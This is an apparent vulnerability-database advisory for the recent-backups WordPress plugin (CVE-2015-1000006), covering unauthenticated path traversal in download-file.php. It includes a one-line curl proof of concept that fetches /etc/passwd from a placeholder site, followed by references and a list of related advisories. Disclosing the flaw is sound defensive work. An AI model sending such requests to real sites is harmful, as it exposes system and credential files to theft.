recent-backups <= 0.7 – Remote File Download | CVE 2015-1000006

Description

Plugin is still affected and has been closed.

The code in download-file.php does not verify if the user is logged in or sanitize which files can be downloaded. This vulnerability can be used to download sensitive system files, such as the Linux passwd file.

Proof of Concept

$ curl -v "http://www.example.com/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd

Affects Plugins

recent-backups

No known fix

References

CVE

CVE-2015-1000006

Exploitdb

37752

URL

https://packetstormsecurity.com/files/#132961/

URL

http://www.vapidlabs.com/advisory.php?v=144

Classification

Type

LFI

OWASP top 10

A1: Injection

CWE

CWE-22

CVSS

7.5 (high)

Miscellaneous

Submitter

Larry W. Cashdollar

Submitter twitter

_larry0

Verified

WPVDB ID

a38dcd9a-987c-4ed4-8366-c75d05ee30bb

Timeline

Publicly Published

2015-08-02 (about 10 years ago)

Added

2015-08-03 (about 10 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2026-05-01

Title

Salon Booking System – Free Version < 10.30.26 - Unauthenticated Arbitrary File Read via Booking File Field Path Traversal

Published

2025-05-20

Title

Madara – Responsive and modern WordPress theme for manga sites < 2.2.2.1 - Unauthenticated Local File Inclusion

Published

2024-11-11

Title

Global Gateway e4 | Payeezy Gateway | <= 2.0 - Unauthenticated Arbitrary File Deletion

Published

2026-02-04

Title

ShortPixel Image Optimizer < 6.4.3 - Authenticated (Editor+) Arbitrary File Read via 'loadFile' Parameter

Published

2023-02-22

Title

Custom Content Shortcode <= 4.0.2 - Contributor+ LFI